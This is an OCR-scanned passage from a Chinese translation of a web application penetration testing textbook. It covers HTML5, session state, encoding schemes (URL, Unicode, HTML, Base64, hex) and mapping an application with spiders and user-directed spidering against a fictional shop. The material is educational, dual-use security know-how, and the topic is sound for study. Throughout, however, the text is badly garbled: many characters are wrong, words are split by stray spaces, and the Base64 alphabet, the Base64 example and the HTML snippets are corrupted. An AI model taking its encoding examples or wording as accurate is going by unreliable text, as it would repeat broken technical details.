得 更 加 复杂 。 我 们 将 在 第 13 章 详细 讨论 这 些 问 题 。 

11. HTML5 

HTML5 是 对 HTML 标 准 的 重大 更 新 。 当 前 ，HTML5 仍 处 在 开 友 阶 
段 ， 仅 在 浏览 器 中 进行 了 小 规模 实施 。 

从 安全 角度 看 ， 我 们 对 HTML5 感 兴趣 主要 出 于 以 下 原因 。 

口 它 引入 了 各 种 可 用 于 传送 路 站 点 脚本 及 实施 其 他 攻击 的 新 标签 、 
属性 和 API (会 在 第 12 章 讲述 ) 。 

口 它 对 XMLHttpRequest 这 一 核心 Ajax 技术 进行 了 修改 ， 在 某 些 情况 
下 可 以 实现 双 癌 跨 域 交互 。 这 可 能 导致 新 的 跨 域 攻击 (会 在 第 13 章 讲 


iW) « 

口 它 引入 了 新 的 客户 端 数据 存储 机 制 ， 这 可 能 导致 用 户 隐 私 问题 以 
及 新 型 攻击 ， 如 客户 端 SQL 注 入 (会 在 第 13 章 讲述 ) 。 

12. “Web 2.0” 

近 些 年 来 ，Web 2.0 这 个 专业 术语 已 经 成 为 一 个 流行 词汇 ， 用 于 
i E A 
口 大 量 使 用 Ajax 执行 各 种 异步 后 台 请 求 ; 

口 使 用 各 种 技术 提高 路 域 集 成 ; 

口 在 客户 病 使 用 各 种 新 搁 术 ， 包 括 XML、JSON 和 Flex; 

口 采用 更 先进 的 技术 来 支持 用 户 生 成 的 内 容 、 信 息 共享 和 交互 。 

和 技术 领域 的 所 有 新 技术 一 样 ， 这 些 趋势 也 造成 了 各 种 安全 漏洞 。 
但 是 ， 总 体 而 言 ， 这 些 漏 洞 并 未 形成 新 的 Web 应 用 程序 安全 问题 。Web 
2.0 相 关 的 漏洞 在 很 大 程度 上 与 这 种 趋势 出 现 之 前 的 漏洞 相同 ， 或 派生 
自 之 前 的 漏洞 。 总 的 来 说 ，“Web 2.0 安 全 ”是 一 个 错误 的 概念 ， 它 对 于 
我 们 考虑 重要 的 问题 并 无 帮助 。 

13. 浏览 器 扩展 技术 

除 JavaScript 功 能 外 ， 一 些 Web 应 用 程序 还 通过 采用 浏览 器 扩展 技 
术 ， 使 用 定制 代码 从 各 方面 扩展 浏览 器 的 内 置 功 能 。 这 些 组 件 可 配置 为 
字 节 码 ， 由 适当 的 浏览 器 插件 执行 ， 或 需要 在 客户 计算 机 上 安装 本 地 可 
执行 程序 。 在 攻击 Web 应 用 程序 时 ， 可 能 过 到 的 厚 客户 端 技术 包括 : 

D Java applet; 

O Activex ta 4#; 


























口 Flashx} &; 
口 Silverlight 对 象 。 
我 们 将 在 第 5 章 详 细 讨 论 这 些 技 术 。 


3.2.3 ”状态 与 会 话 


迄今 为 止 ， 本 书 讨论 的 技术 主要 用 于 帮助 Web 应 用 程序 服务 器 和 客 
户 端 组 件 以 各 种 方式 进行 数据 交换 和 处 理 。 但 是 ， 为 实现 各 种 有 用 的 功 
能 ， 应 用 程序 需要 追踪 每 名 用 户 通过 不 同 的 请 求 与 应 用 程序 交互 的 状 
态 。 例 如 ， 一 个 购物 应 用 程序 允许 用 户 浏览 产品 目录 、 往 购物 车 内 添加 
商品 、 查 看 并 更 新 购物 车 内 容 、 结 账 并 提供 个 人 与 支付 信息 。 

为 实现 这 种 功能 ， 应 用 程序 必须 维护 一 组 在 提交 各 种 请 求 过 程 中 由 
用 户 操 作 生 成 的 有 状态 数据 。 这 些 数据 通常 保存 在 一 个 叫做 会 话 的 服务 
器 端 结 构 中 。 当 用 户 执行 一 个 操作 “〈 如 在 购物 车 中 添加 一 件 商 品 ) 时 ， 
服务 器 端 应 用 程序 会 在 用 户 会 话 内 更 新 相关 信息 。 以 后 用 户 碍 看 购物 车 
中 的 内 容 时 ， 应 用 程序 就 使 用 会 话 中 的 数据 向 用 户 返 回 正 确 的 信息 。 

在 一 些 应 用 程序 中 ， 状 态 信息 保 存在 客户 端 组 件 而 非 服 务 器 中 。 服 
务 器 在 响应 中 将 当前 的 数据 传送 给 客户 端 ， 客 户 端 再 在 请 求 中 将 其 返回 
给 服务 器 。 当 然 ， 由 于 通过 客户 端 组 件 传送 的 任何 数据 都 可 被 用 户 修 
改 ， 因 此 ， 应 用 程序 需要 采取 措施 阻止 攻击 者 更 改 这 些 状态 信息 ， 破 坏 
应 用 程序 的 逻辑 。ASP.NET 平 台 利 用 隐藏 表单 字段 ViewState 保 存 与 用 户 
的 Web 界 面 有 关 的 状态 信息 ， 从 而 减轻 服务 器 的 工作 负担 。 默 认 情 况 
下 ，ViewState 的 内 容 中 还 包括 一 个 密 钥 散 列 ， 以 防止 受到 破坏 。 

因为 HTTP 协 议 本 身 并 没有 状态 ， 为 使 用 正确 的 状态 数据 处 理 每 个 
请 求 ， 大 多 数 应 用 程序 需要 采用 某 种 方法 在 各 种 请 求 中 重新 确认 每 一 名 
用 户 的 身份 。 通 常 ， 应 用 程序 会 同 每 名 用 户 发 布 一 个 令 牌 ， 对 用 户 会 话 
进行 唯一 标识 ， 从 而 达到 这 一 目的 。 这 些 令 牌 可 使 用 任何 请 求 参数 传 
输 ， 但 许多 应 用 程序 往往 使 用 HTTP cookie 来 完成 这 项 任务 。 会 话 处 理 
过 程 中 也 会 产生 几 种 漏洞 ， 第 7 章 将 详细 讨论 这 些 内 容 。 






































3.3 ”编码 方案 


Web 应 用 程序 对 其 数据 采用 几 种 不 同 的 编码 方案 。 在 早期 阶段 ， 
HTTP 协议 和 HTML 语 言 都 是 基于 文本 的 ， 于 是 人 们 设计 出 不 同 的 编码 

方案 ， PARZ EE Lil E 够 安全 处 理 不 第 见 的 字符 和 二 进 制 数 据 。 攻 击 
Webb EEE FE 需要 使 用 相关 方案 对 数据 进行 编码 ， 确 保 应 用 程序 按 
照 想 要 的 方式 对 其 进行 处 理 。 而 且 ， 在 许多 情况 下 ， 攻 击 者 甚至 能 够 控 
制 应 用 程序 所 使 用 的 编码 方案 ， 造 成 其 设计 人 员 无 法 预料 的 行为 。 


3.3.1 _URL 编 码 


UREL 只 人 允许 使 用 US-ASCII 字 符 集 中 的 可 打印 字符 〈 也 束 是 ASCII 代 
码 在 0x20 ~ 0x7e 范 围 内 的 字符 ) 。 而 且 ， 由 于 其 在 URL 方 案 或 HITP 协 
议 内 具有 特殊 含义 ， 这 个 苑 5 围 内 的 一 些 字 符 也 不 能 用 在 URL 中 。 

URL 编 码 方 案 主要 用 于 对 扩展 ASCII 字 符 集中 的 任何 有 问题 的 字符 
进行 编码 ， 使 其 可 通过 HTTP 安 全 传输 。 任 何 URL 编 码 的 字符 都 以 % 为 
前 级 ， 其 后 是 这 个 字符 的 两 位 十 六 进 制 ASCII 人 代码。 以 下 是 一 些 常 见 的 

URL SIE 

口 %3d 代 表 =; 

口 %25 代 表 %; 

口 %20 代 表 空 格 ; 

口 %0a 代 表 新 行 ; 

口 %00 代 表 空 字 节 。 

另 一 个 值得 注意 的 编码 字符 是 加 号 (+) ， 它 代表 URL 编 码 的 空格 
〈《 除 %20 代 表 空 格外 ) 。 





























wo 
SA 
=> 注解 ” 当 攻 击 Web 应 用 程序 时 ， 如 果 需 要 将 以 下 字符 当做 
数据 插入 HTTP 请 求 中 ， 渗 透 测 试 员 必 须 对 它们 进 间 行 URL 编 码 。 
空格 % ? R= +H 
(当然 ， 当 修改 请 求 时 ， 往 往 需要 使 用 这 些 字符 的 特殊 含义 ， 
例如 ， 给 查询 字符 串 添 加 另外 一 个 请 求 参数 。 tnt AHS 
的 字面 量 形式 。) 





3.3.2 Unicode f4 


Unicode 是 一 种 为 支持 全 志 界 所 使 用 的 各 种 编写 系统 而 设计 的 字符 
编码 标准 ， 它 采用 各 种 编码 方案 ， 其 中 一 些 可 用 于 表示 Web 应 用 程序 中 
的 不 常见 字符 。 

16 位 Unicode 编 码 的 工作 原理 与 URL 编 码 类 似 。 为 通过 HTTP 进 行 传 
输 ，16 位 Unicode 编 码 的 字符 以 %u 为 前 级 ， 其 后 是 这 个 字符 的 十 六 进 制 
Unicode 码 点 。 例 如 : 

口 %u2215 代 表 /; 

口 %u00e9 代 表 é。 

UTF-8 是 一 种 长 度 可 变 的 编码 标准 ， 它 使 用 一 个 或 几 个 字 节 表示 每 
个 字符 。 为 通过 HTTP 进 行 传输 ，UTF-8 编 码 的 多 字 节 字符 以 % 为 前 级 ， 
其 后 用 十 六 进 制 表 示 每 个 字 节 。 例 如 : 

口 %c2%a9 代 表 ©: 

口 %e2%89%a0 代 表 z。 

攻击 Web 应 用 程序 时 之 所 以 要 用 到 Unicode 编 码 ， 主 要 在 于 有 时 可 
用 它 来 破坏 输入 确认 机 制 。 如 果 输 入 过 滤 阻 止 了 某 些 恶意 表达 式 ， 但 随 
后 处 理 输入 的 组 件 识 别 Unicode 编 码 ， 就 可 以 使 用 各 种 标准 与 畸形 
Unicode 编 码 避 开 过 滤 。 


3.3.3 HTML 编码 


HTML 编 码 是 一 种 用 于 表示 问题 字符 以 将 其 安全 并 入 HIML 文 档 的 
方案 。 有 许多 字符 具有 特殊 的 含义 〈 如 HTML 内 的 元 字符 ) ， 并 被 用 于 
定义 文档 结构 而 非 其 内 容 。 为 了 安全 使 用 这 些 字 符 并 将 其 用 在 文档 内 容 
中 ， 就 必须 对 其 进行 HTML 编码 。 

HTML 编 码 定义 了 大 量 HTML 实 体 来 表示 特殊 的 字面 量 字 符 ， 例 


如 : 
口 "代表 ”; 
Ot’; 
口 & 代 表 &; 
口 £1t ;代表 <:; 
A ESEME. 
m 此 外 ， 任 何 字 符 都 可 以 使 用 它 的 十 进 制 ASCII 码 进行 HIML 编码， 
列 如 : 
口 "代表 "; 




















口 #39; 代 表 ;。 

或 者 使 用 十 六 进 制 的 ASCII 码 (以 x 为 前 级 ) ， 例 如 : 

口 "代表 ”; 

OTe’. 

当 攻 击 Web 应 用 程序 时 ，HTML 编 码 主要 在 探查 路 站 点 脚本 漏洞 时 
发 挥 作用 。 如 果 应 用 程序 在 响应 中 返回 未 被 修改 的 用 户 输入 ， 那 么 它 可 
能 易于 受到 攻击 ;， 但是， 如 果 它 对 危险 字符 进行 HTML 编 码 ， 也 许 比较 
安全 。 请 参阅 第 12 章 了 解 有 关 这 些 漏 洞 的 更 多 详情 。 


3.3.4 ”Base64 编 码 


Base64 编 码 仅 用 一 个 可 打印 的 ASCII 字 符 就 可 安全 转换 任何 二 进 制 
数据 ， 它 常用 于 对 电子 邮件 附件 进行 编码 ， 使 其 通过 SMTP 安 全 传输 。 
它 还 可 用 于 在 基本 HTTP 验 证 机 制 中 对 用 户 证 书 进行 编码 。 

Base64 编 码 将 输入 数据 转换 成 3 个 字 节 块 。 每 个 块 被 划分 为 4 段 ， 
段 6 个 数据 位 。 这 6 个 数据 位 有 64 种 不 同 的 排列 组 合 ， 因 此 每 个 段 可 使 用 
一 组 64 个 字符 表示 。Base64 编 码 使 用 以 下 字符 集 ， 其 中 只 包含 可 打印 的 
ASCII 字 符 : 


AECDEFGEIJKLMNOPQORSTUVWKYZabcdefghi jklmnoperstuvwxyz01234567399+/ 


oo ee Hai MAARA 
(=) 补足 输 
例如 ，The Web Application Hacker’s Hand book 的 Base64 编 码 为 : 


VGh1LIFd1YiBBcHBsaWNhdGlvbiBIYWNrZxXIncyBIYw5kYm9vaw== 


许多 Web 应 用 程序 利用 Base64 编 码 在 cookie 与 其 他 参数 中 传送 二 进 
制 数据 ， 甚 至 用 它 打 乱 敏 感 数据 以 防止 即使 是 细微 的 修改 。 应 该 总 是 留 
意 并 解码 发 送 到 客户 端的 任何 Base64 数 据 。 由 于 这 些 数据 使 用 特殊 的 字 
符 集 ， 而 且 有 时 会 在 字符 串 末 尾 添加 补足 字符 (=) ， 因 此 可 以 轻易 辨 
别 出 Base64 编 码 的 字符 串 。 











pias 六 进 制 编 碟 


许多 应 用 程序 在 传送 二 进 制 数据 时 直接 使 用 十 六 进 制 编码 ， 用 
ASCII 字 符 表 示 十 六 进 制 数据 块 。 例 如 ， 对 cookie 中 的 用 户 名 daf 进 行 十 
六 进 制 编码 ， 会 得 到 以 下 结果 : 

646166 

和 Base64 编 码 的 数据 一 样 ， 十 六 进 制 编码 的 数据 通常 也 很 容易 辩 


认 。 为 了 解 十 六 进 制 编码 的 功能 应 当 对 服务 器 发 送 到 客户 端的 任何 十 六 
进 制 数据 进行 解码 。 


3.3.6 ”远程 和 序列 化 框架 


近 些 年 出 现 了 各 种 用 于 创建 用 户 界 面 的 框架 ， 这 些 框 架 中 的 客户 并 
代码 可 以 远程 访问 服务 器 端 实施 的 编程 API。 利 用 这 些 框架 ， 开 发 者 可 
以 在 一 定 程 度 上 忽略 Web 应 用 程序 的 分 布 式 本 质 ， 而 以 与 开发 传统 桌面 
应 用 程序 类 似 的 方式 编写 代码 。 这 些 框架 通常 提供 客户 端 上 使 用 的 存根 
API。 它 们 还 能 够 自动 处 理 以 下 两 个 任务 : 通过 这 些 API 远 程 调用 相关 
服务 器 端 功能 ， 对 传送 给 上 述 功能 的 任何 数据 进行 序列 化 。 

这 类 远程 和 序列 化 框架 包括 : 

口 Flex 和 AMF; 

g Silverlight 和 WCF; 

口 Java 序 列 化 对 象 。 

我 们 将 在 第 4 章 和 第 5 章 讨论 使 用 这 些 框架 的 技巧 以 及 由 此 引发 的 安全 问 


elo 











3.4 =E 


到 现在 为 止 ， 我 们 已 经 介绍 了 Web 应 用 程序 的 当前 安全 〈 风 险 ) 状 
况 ， 分 析 了 Web 应 用 程序 的 核心 防御 机 制 ， 并 简要 介绍 了 当今 应 用 程序 
所 采用 的 关键 技术 。 基 于 这 些 基础 知识 ， 现 在 我 们 将 开始 研究 渗透 测试 
员 如 何 癌 Web 应 用 程序 发 动 攻击 。 

在 实施 任何 攻击 之 前 ， 首 要 任务 是 仔细 分 析 目 标 应 用 程序 的 内 容 及 
功能 ， 了 解 它 的 工作 原理 、 防 御 机 制 及 其 使 用 的 技术 。 我 们 将 在 下 一 章 
详细 介绍 这 个 解析 过 程 ， 说 明 如 何 通 过 它 深 入 了 解 应 用 程序 的 受 攻击 
面 。 实 践 证 明 ， 这 个 过 程 对 于 渗透 测试 员 发 现 并 利用 目标 应 用 程序 的 安 
全 漏洞 至 关 重 要 。 











3.5 问题 


AKU [a] eS, WW Te] http://mdsec.net/wahh. 

(1) OPTIONS 方 法 有 什么 作用 ? 

(2) If-Modified-Since 和 If-None-Match 消 息 头 的 作用 是 什么 ? 它们 
为 何 引起 攻击 者 的 兴趣 ? 

(3) 当 服 务 器 设置 cookie 时 ，secure 标 签 有 什么 意义 ? 

(4) 常用 状态 码 301 与 302 有 什么 不 同 ? 

(5) 使 用 SSL 时 ， 浏 览 器 如 何 与 Web 代 理 实现 互 操 作 ? 


J 攻 击 应 用 程序 的 第 一 步 是 收集 和 分 析 与 其 有 关 的 一 些 关键 信息 ， 
以 清楚 了 解 攻击 目标 。 解 析 过 程 首先 是 枚 举 应 用 程序 的 内 容 与 功能 ， 从 
而 了 解 应 用 程序 的 实际 功能 与 运行 机 制 。 我 们 可 轻松 确定 应 用 程序 的 大 
a ener 

能 查 明 。 

列 出 应 用 程序 的 功能 后 ， 接 下 来 的 首要 任务 就 是 仔细 分 析 应 用 程序 
运行 机 制 的 每 一 个 方面 、 核 心安 全 机 制 及 其 〈 在 客户 端 和 服务 器 上 ) 使 
用 的 技术 。 这 样 就 可 以 确定 应 用 程序 暴露 的 主要 党 攻击 面 并 因此 确定 随 
后 探查 过 程 的 主要 目标 ， 进 而 发 现 可 供 利用 的 漏洞 。 我 们 在 本 章 后 面部 
分 将 讲 到 ， 通 种 在 分 析 过 程 中 就 可 以 有 发现 相 关 漏 洞 。 

随 痢 应 用 程序 变 得 越 来 越 复杂 ， 功 能 越 来 越 强 大 ， 有 效 的 解析 将 成 
为 一 种 重要 技能 。 经 验 丰 富 的 专家 能 够 迅速 对 所 有 功能 区 域 进行 分 类 ， 
参照 各 种 实例 俘 找 不 同类 型 的 漏 凋 ， 同 时 花费 大 量 时 间 测 试 其 他 特定 区 
域 ， 以 确定 高 风险 的 问题 。 

本 章 将 描述 应 用 程序 解析 过 程 的 主要 步骤 、 各 种 可 用 来 提高 效率 的 
技巧 与 穷 门 ， 以 及 一 些 帮助 进行 解析 的 工具 。 











4.1 准 内 容 与 功能 


通常 ， 手 动 浏览 即 可 确定 应 用 程序 的 绝 大 部 分 内 容 与 功能 。 浏 览 应 
用 程序 的 基本 方法 是 从 主 初始 页 面 开始 ， 然 后 是 每 一 个 链接 和 所 有 多 阶 
段 功 能 (如 用 户 注 册 或 密码 重 设置 ) 。 如 果 应 用 程序 有 一 个 “站 点 地 
图 ”， 可 以 从 它 开始 枚 举 内 容 。 

但 是 ， 为 了 仔细 检查 枚 举 的 内 容 ， 全 面 记录 每 一 项 确定 的 功能 ， 我 
们 有 必要 使 用 一 些 更 加 先进 的 技术 ， 而 不 仅仅 是 简单 浏览 。 


4.1.1 Webi Ax 


我 们 可 使 用 各 种 工具 上 自动 抓 取 Web 站 点 的 内 容 。 这 些 工具 首先 请 求 
一 个 web 页 面 ， 对 其 进行 分 析 ， 碍 找 连 接 到 其 他 内 容 的 链接 ， 然 后 请 求 
这 些 内 容 ， 再 继续 进行 这 个 循环 ， 直 到 找 不 到 新 的 内 容 为 止 。 

基于 这 一 基本 功能 ，Web 应 用 程序 爬虫 (spider) 以 同样 的 方式 分 
析 HIML 表 单 ， 并 使 用 各 种 预先 设 定 值 或 随机 值 将 这 些 表单 返回 给 应 用 
程序 ， 以 扩大 搜索 范围 、 浏 览 多 阶段 功能 、 进 行 基 于 表单 的 导航 《〈 如 什 
么 地 方 使 用 下 拉 列 表 作 为 内 容 菜单 ) 。 一 些 工 具 还 对 客户 端 JavaScript 进 
行 某 种 形式 的 分 析 ， 以 提取 指 同 其 他 内 容 的 URL。 有 各 种 免费 工具 可 以 
详细 枚 举 应 用 程序 的 内 容 与 功能 ， 它 们 包括 Burp Suite, WebScarab, 

Zed Attack Proxy 和 CAT (请 参阅 第 20 半 了解 详 情 〉。 




















W 提示 许多 Web 服 务 器 的 Web 根 目录 下 有 一 个 名 为 robots.txt 
的 文件 ， 其 中 列 出 了 站 点 不 希望 Web 拒 虫 访问 或 搜索 引擎 列 入 索引 
的 URL。 有 时 ， 这 个 文件 中 还 包含 敏感 功能 的 参考 信息 ， 渗 透 测 试 
员 肯 定 会 对 抓 取 这 些 信息 感 兴趣 。 一 些 攻 击 Web 应 用 程序 的 抓 取 工 
具 会 搜索 robots.txt 文 件 ， 并 根据 其 中 列 出 的 URL 开 始 抓 取 过 程 。 在 
这 种 情况 下 ，robots.txt 文 件 可 能 会 危及 Web 应 用 程序 的 安全 。 


在 本 章 中 ， 我 们 将 以 一 个 虚构 的 应 用 程序 Extreme Internet 
Shopping (EIS〉 为 例 ， 说 明和 常见 的 应 用 程序 解析 操作 。 使 用 Burp Spider 
解析 EIS 的 过 程 如 图 4-1 所 示 。 不 需要 登录 ， 即 可 以 解析 出 /shop 目 录 
及 /media 目 录 中 的 两 件 新 商品 。 还 要 注意 的 是 ， 图 中 显示 的 robots.txt 文 




















件 引 用 了 /mdsecportal 和 /site-old H 录 。 这 两 个 目录 没有 链接 到 应 用 程序 
中 的 任何 位 置 ，Web 疏 虫 仅仅 通 过 访问 公开 内 容 中 的 链接 不 可 能 发 现 这 
些 目录 。 

burp suite professional cor x 


| targat | prow spider scanner | intruder | repeater Sequencer decoder | comparar | options alerts 


Sitemap ` scope 
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图 4-1 使 用 BurpSpider 解 析 应 用 程序 的 部 分 内 容 








Y JER 采用 REST 风 格 的 URL 的 应 用 程序 使 用 部 分 URL 文 件 
路 径 来 唯一 标识 应 用 程序 所 使 用 的 数据 和 其 他 资源 (请 参阅 第 3 章 
了 解 详情 〉。 在 这 些 情况 下 ， 传 统 Web 扑 虫 的 基于 URL 的 应 用 程序 
视图 非常 有 用 。 在 EIS 应 用 程序 中 ， /shop 和 /pub 路 径 采用 了 REST 风 
抓 取 这 些 区 域 即 可 轻松 获取 这 些 路 径 中 的 商品 的 唯一 链 


尽管 通常 能 够 进行 有 效 的 抓 取 ， 但 这 种 完全 上 自动 化 的 方法 在 内 容 枚 

















举 方面 还 存在 一 些 重 要 的 限制 。 

口 这些 工 具 一 般 无 法 正确 处 理 不 常用 的 导航 机 制 ( 如 使 用 复杂 的 
a ， 因 此 可 能 会 遗漏 应 用 程序 某 个 
方面 的 功能 。 

口 爬 虫 可 能 无 法 抓 取 到 隐藏 在 编译 客户 端 对 象 〈 如 Flash 和 Java 
applet) 中 的 链接 。 

口 多 阶段 功能 往往 会 严格 地 执行 输入 确认 检查 ， 因 而 可 能 不 会 接受 
由 目 动 工具 提交 的 值 。 例 如 ， 用 户 注 册 表 单 中 可 能 包含 姓名 、 电 子 邮 件 
地 址 、 电 话 号 码 和 邮政 编码 字段 。 自 动 应 用 程序 息 虫 通常 会 同 每 一 个 可 
编辑 的 表单 字段 提交 一 个 单独 的 测试 字符 串 ， 而 应 用 程序 将 返回 一 条 错 
误 消 息 ， 称 其 提交 的 一 个 或 几 个 数据 无 效 。 由 于 和 的 虫 并 没有 能 力 理解 这 
种 错误 消息 并 采取 相应 行动 ， 所 以 也 惑 无 法 成 功 通过 注册 ， 因 此 无 法 发 
现 这 以 后 的 任何 其 他 内 容 或 功能 。 

口 自动 化 怜 虫 通 稼 使 用 UREL 作 为 内 容 标识 符 。 为 避免 进行 连续 不 确 
定 的 抓 取 ， 如 果 疏 虫 认识 到 链接 内 容 已 被 请 求 ， 它 们 会 识别 出 来 并 且 不 
会 再 回 其 发 出 请 求 。 但 是 ， 许 多 应 用 程序 使 用 基于 表单 的 导航 机 制 ， 其 
中 相同 的 UREL 可 能 返回 截然 不 同 的 内 容 和 功能 。 例 如 ， 一 个 银行 应 用 程 
序 可 能 通过 一 个 指向 /account.jsp 的 POST 请 求 执行 每 一 项 用 户 操 作 ， 并 
使 用 参数 传达 执行 的 操作 。 如 果 疏 虫 拒绝 癌 这 个 URL 提 交 多 次 请 求 ， 它 
就 会 遗漏 应 用 程序 的 大 部 分 功能 。 一 些 应 用 程序 爬虫 试图 解雇 这 一 问题 

(例如 ， 可 对 Brup Spider 进行 配置 ， 使 其 根据 参数 名 称 和 参数 值 对 提交 
的 表单 进行 “个 性 化 ”处理 ) 。 但 是 ， 在 许多 情况 下 ， 这 种 完全 目 动 化 的 
方法 并 非 绝 对 有 效 。 本 章 后 面 我 们 会 讨论 解析 这 一 功能 的 方法 。 

口 与 前 面 的 情形 恰恰 相反 ， 一 些 应 用 程序 在 UREL 中 插入 实际 上 并 不 
用 于 确定 资源 或 功能 的 可 变数 据 〈 人 例如， 包含 定时 器 或 随机 数 种 子 的 参 
数 ) 。 应 用 程序 的 每 个 页 面 中 都 可 能 包含 一 组 似乎 是 爬虫 必须 请 求 的 新 
URL， 导 致 它 不 断 进行 不 确定 的 抓 取 。 

口 如 果 应 用 程序 使 用 身份 验证 机 制 ， 应 用 程序 爬虫 要 实现 有 效 抓 
取 ， 必 须 能 够 处 理 这 种 机 制 才能 访问 它 所 保护 的 功能 。 如 果 为 其 手动 配 
置 一 个 通过 验证 的 会 话 令 牌 或 提交 给 登录 功能 的 证 书 ， 前 面 提 到 的 爬虫 
就 能 实现 有 效 抓 取 。 然 而 ， 即 使 获得 令 牌 或 证 书 ， 由 于 各 种 原因 ， 疏 果 
执行 的 一 些 操作 也 会 让 通过 验证 的 会 话 中 断 。 

E 由 于 访问 所 有 URL， 疏 虫 会 在 某 个 时 候 请 求 退出 功 
能 ， 致 使 会 话 中 断 。 

m 如 果 爬 果 癌 某 个 敏感 功能 提交 无 效 输入 ， 应 用 程序 
可 能 会 进行 目 我 防御 ， 终 止 会 话 。 

m 如 果 应 用 程序 在 每 个 页 面 都 使 用 令 牌 ， 爬 虫 肯 定 无 


















































法 按 正 确 的 顺序 请 求 页 面 ， 这 可 能 引起 应 用 程序 结束 


Ea 


LO ii 在 一 些 应 用 程序 中 ， 即 使 运行 一 个 解析 并 请 求 
链接 的 简单 Web 怜 虫 也 可 能 极其 危险 。 例 如 ， 应 用 程序 可 能 具有 册 
除 用 户 、 关 闭 数据 库 、 重 启 服务 器 等 管 理 功能。 如 果 使 用 应 用 程序 
感知 的 私 虫 ， 该 耻 虫 发 现 并 使 用 敏感 功能 ， 就 可 能 造成 巨大 损失 。 
我 们 曾经 遇 到 一 个 应 用 程序 具有 某 种 内 容 管理 系统 (CMS) 功能 
它 可 编辑 主 应 用 程序 的 实际 内 容 。 这 项 功能 可 通过 站 点 地 图 发 现 ， 
并 且 没 有 受到 任何 访问 控制 的 保护 。 如 果 针 对 这 个 站 点 运行 自动 化 
怜 虫 ， 它 就 会 发 现 编辑 功能 并 开始 发 送 任意 数据 ， 致 使 主 Web 站 点 
的 内 容 在 疏 虫 运行 时 就 被 扭曲 。 





4.1.2 4 $8 EH 


这 是 一 种 更 加 复杂 且 可 控制 的 技巧 ， 它 比 自动 化 抓 取 更 加 先进 。 用 
户 使 用 已 通过 标准 济 览 吉 以 常规 方式 浏览 应 用 程序 ， 试 图 枚 举 应 用 程序 
。 之 后 ， 生 成 的 流量 穿 过 一 个 组 合 拦截 代理 服务 器 ER KS 

监控 所 有 请 求 和 啊 应 。 该 工具 绘制 应 用 程序 地 图 、 和 集中 由 浏览 器 
的 所 有 URL， 并 且 像 一 个 正 第 的 应 用 程序 感知 爬虫 那样 分 析 应 用 程 
序 的 啊 应 ， 同 时 用 它 发 现 的 内 容 与 功 和 | 。 Burp Suite 和 
WebScarab 中 的 爬虫 即 可 用 于 这 种 用 途 〈 请 参阅 第 20 章 了 解 详 细 信 
A). 

相 比 于 基本 的 抓 取 方法 ， 该 技巧 具有 诸多 优点 。 

口 如 果 应 用 程序 使 用 不 常用 的 导航 机 制 ， 用 户 能 够 以 常规 方 
式 使 用 浏览 喜来 遵循 这 些 机 制 。 用 户 访问 的 任何 功能 和 内 容 将 由 代理 服 
务 器 /爬虫 工具 处 理 。 

a 用 户 控 制 提 交 到 应 用 程序 的 所 有 数据 ， 这 样 可 确保 满足 数据 确认 
要 求 。 

口 用 户 能 够 以 常规 方式 登录 应 用 程序 ， 确 保 通 过 验证 的 会 话 在 整 
解析 过 程 中 保持 活动 状态 。 如 果 所 执行 的 任何 操作 导致 会 话 终止， 
可 重新 登录 并 继续 浏览 。 

m) 由 于 该 技巧 可 从 应 用 程序 的 啊 应 中 解析 出 链接 ， 因 而 它 能 够 完整 


























枚 举 任何 危险 功能 〈 如 deleteUser.jsp) ， 并 能 将 其 合并 到 站 点 地 图 中 。 
但 是 用 户 可 以 根据 自己 的 判断 决定 请 求 或 执行 哪些 功能 。 
在 Extreme Internet Shopping 站 点 中 ， 以 前 爬虫 无 法 为 home 中 的 任 

何 内 容 建 立 索 引 ， 因 为 这 些 内 容 已 通过 验证 。 针 对 /home 的 请 求 将 导致 
以 下 啊 应 : 

HTTP/1.1 302 Moved Temporarily 

Date: Mon, 24 Jan 2011 16:13:12 GMT 

Server: Apache 

Location: /auth/Login?ReturnURL=/home/ 


通过 用 户 指导 的 抓 取 ， 用 户 可 以 直接 使 用 浏览 器 登录 应 用 程序 ， 随 
后 代理 服务 器 /爬虫 工具 将 提取 生成 的 会 话 ， 并 确定 现在 对 用 户 可 用 的 
所 有 其 他 内 容 。 用 户 成 功 通 过 应 用 程序 受 保护 区 域 的 验证 时 的 EIS 站 点 
地 图 如 图 4-2 所 示 。 
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response | request | 
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<br> 


<br> 

sa href-"3" onclick*"ui_nav! Profile') “>private 
prefile</a><br /> 

<A Arete" pub/user/ 1 "pnbie protile</a><r 

<a hrete"/ home/myaccounct">account 
information</a><bs> 

<a hret="/home/rceqiater">register a card with 
EIS</ a><b-> 

<a hrete" home/scarch">search the store</a<br> 
<a lee l-"! home/ pactuec”>pactnere</a><bs> 

<a aret@="/gb">leave feedback</«><br> 























这 揭示 了 主 菜单 系统 中 的 其 他 一 些 资源 。 该 图 显示 了 一 个 对 私有 用 
资料 的 引用 ， 此 用 户 资料 通过 onClick 事 件 处 理 程 序 启动 的 JavaScript 
函数 访问 : 
<a href="#" onclick="ui_nav({'profile')">private profile</a> 
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种 类 型 的 链接 。 即 使 是 最 先进 的 目 动 化 应 用 程序 爬虫 ， 仍 然 无 法 抓 取 当 
前 应 用 程序 和 浏览 器 扩展 所 采用 的 各 种 导航 机 制 。 但 是 ， 通 过 用 户 指导 
的 抓 取 ， 用 户 只 需 使 用 浏览 器 访问 屏幕 上 可 见 的 链接 ， 代 理 服务 器 / 爬 
中 工具 就 会 将 生成 的 内 容 添 加 到 站 点 地 图 中 。 

相反 ， 值 得 注意 的 是 ， 不 虫 已 成功 确定 HIML 注 释 中 包含 的 指 
问 /core/sitestats 的 链接 ， 即 使 该 链接 并 未 在 屏幕 上 癌 用 尸 显示 。 











VY fem 除 上 面 描述 的 代理 服务 器 /爬虫 工具 外 ， 在 应 用 程序 

解析 过 程 中 ， 我 们 还 经 常 使 用 一 些 其 他 工具 ， 如 可 从 浏览 器 界面 执 
行 HTTP 和 HTML 分 析 的 各 种 浏览 器 扩展 工具 。 例 如 ， 图 4-3 所 示 的 
IEWatch 工 具 可 在 Microsoft Internet Explorer 中 运行 ， 对 所 有 请 求 和 
啊 应 〈 包 括 消 息 头 、 请 求 参 数 与 cookie) 进行 监控 ， 并 分 析 每 一 个 
应 用 程序 页 面 ， 以 显示 链接 、 脚 本、 表单 和 厚 客 户 病 组 件 。 虽 然 可 
以 在 拦截 代理 服务 器 中 查看 所 有 这 些 信息 ， 但 是 ， 拥 有 男 一 份 解 析 
数据 有 助 于 更 好 地 了 解 应 用 程序 ， 并 枚 举 它 的 所 有 功能 。 请 参阅 第 
20 曹 了解 有 关 这 种 工具 的 详细 信息 。 
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渗透 测试 步 又 


